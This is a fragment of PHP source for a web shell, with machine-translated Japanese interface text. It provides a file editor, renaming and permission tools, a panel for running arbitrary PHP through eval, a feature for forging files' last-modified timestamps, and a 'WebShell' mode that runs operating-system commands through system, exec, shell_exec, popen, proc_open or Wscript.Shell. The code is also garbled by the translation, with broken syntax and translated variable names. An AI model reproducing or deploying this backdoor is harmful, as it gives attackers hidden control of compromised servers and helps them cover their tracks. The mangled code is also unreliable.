$tb->tdbody('現在のファイル: '.$tb->makeinput('editfilename',$filename).' 新しいファイルを作成するには、新しいファイル名を入力してください。 PHP コード暗号化: < 入力タイプ="checkbox" name="change" value="yes" onclick="javascript:alert('この関数は、完全な PHP コードを暗号化または圧縮する場合にのみ使用できます。 \n\n非 PHP コードや不完全な PHP コードを使用したり、gzinflate 関数をサポートしていないコードは使用しないでください。 ')"> ');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile

elseif ($_GET['action'] == "名前変更") {
$nowfile = (isset($_POST[ '新しい名前'])) $_POST['新しい名前'] : Basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($) fname);
$tb->tableheader();
$tb->formheader($action,'ファイル名を変更');
$tb->makehidden('oldname',$dir."/"。 $nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('現在のファイル名: '.basename($nowfile)); '名前の変更: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30 ' );
}//名前変更終了

elseif ($_GET['action'] == "eval") {
$action = "?dir=".urlencode($dir).""; ;tableheader();
$tb->formheader(''.$action.' "target="_blank' ,'PHP スクリプトを実行');
$tb->tdbody($tb->maketextarea( ') phpcode',$contents));
$tb->formfooter('1','30');

}
elseif ($_GET['action'] == "fileperm") {
$action = " ?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'ファイル属性の変更');
$ tb ->tdbody('「.$file.' の属性を次のように変更します。'.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10, 8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30')
}//end fileperm

elseif ($_GET['action'] == "新しい時間") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('1 月'=>1,'2 月'=>2,'3 月'=> ;3、「4 月」=>4、「5 月」=>5、「6 月」=>6、「7 月」=>7、「8 月」=>8、「9 月」=>9 ,'10 月'=>10,'11 月'=>11,'12 月'=>12);
$tb->tableheader();
$tb->formheader($action,'ファイルのクローンを作成します)最終変更時刻');
$tb->tdbody("ファイルを変更: ".$tb->makeinput('curfile',$file,'readonly')." → 対象ファイル: ".$tb-> ;makeinput('tarfile','フルパスとファイル名が必要です'),'center','2','30');
$tb->makehidden('do','domodtime'); ->formfooter('','30');
$tb->formheader($action,'カスタム ファイルの最終変更時刻');
$tb->tdbody('
有効なタイムスタンプの一般的な範囲は、1901 年 12 月 13 日金曜日 20:45:54 GMT から 2038 年 12 月 19 日火曜日 03:14:07 までです。
(この日付は、(最小値と最大値からの) に基づいています。 32 ビットの符号付き整数)
  • 注: 日は 01 ~ 30、時間は 0 ~ 24、分と秒は 0 ~ 60 です。!','left');
    $tb->tdbody('現在のファイル名: '.$file);
    $tb->makehidden('curfile',$ file); tb->tdbody('次のように変更します: '.$tb->makeinput('年','1984','','テキスト','4').'年'.$tb ->makeselect( array('name'=>'month','option'=>$cachemonth,'selected'=>'10月')).' month'.$tb->makeinput(' data','18 ','','text','2').'day'.$tb->makeinput('hour','20','','text','2')。 tb->makeinput('分','00','','テキスト','2').' 分'.$tb->makeinput('秒','00', '','テキスト','2').' 秒','center','2','30');
    $tb->makehidden('do','modmytime'); 1','30');
    }//end newtime

    elseif ($_GET['action'] == "shell") {
    $action = "??action=shell&dir=". ;
    $tb->tableheader();
    $tb->tdheader('WebShell モード');
    if (substr(PHP_OS, 0, 3) == 'WIN') {
    $ プログラム = isset($) _POST['プログラム']) $_POST['プログラム'] : "c:winntsystem32cmd.exe";
    $prog = isset($_POST['prog']) : "/c net start > ".$pathname."/log.txt";
    echo "
    n";
    $tb->tdbody('エコーなしでプログラムを実行→ ファイル: '.$tb->makeinput('program',$program).' パラメータ: '.$tb->makeinput ('prog', $prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center',' 2','35 ');
    $tb->makehidden('do','programrun');
    echo "
    n";
    }
    echo "
    n";
    if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
    $tb ->tdbody( 'ヒント: 出力結果が不完全な場合は、出力結果をファイルに書き込むことをお勧めします。これにより、コンテンツ全体を取得できます。 ');デフォルトの winnt システムは自分で行ってください。セットアップして使用し、自分で変更してください。忘れずに終了するように記述してください。そうしないと、未完了のプロセスがホスト上に残ります。'
    $tb->tdbody(' proc_open 関数で使用される cmd プログラム:'.$tb-> ;makeinput('cmd',$cmd,'','text','30').'(Linux システムの場合は、変更できます)それは自分自身です)');$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen ','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec' =>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); 
    $tb->tdbody('选择执実行関数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$ excfunc)).' 入力コマンド: '.$tb->makeinput('command',$_POST['command'],'','text','60').' ('','実行','','送信')); 
    ?>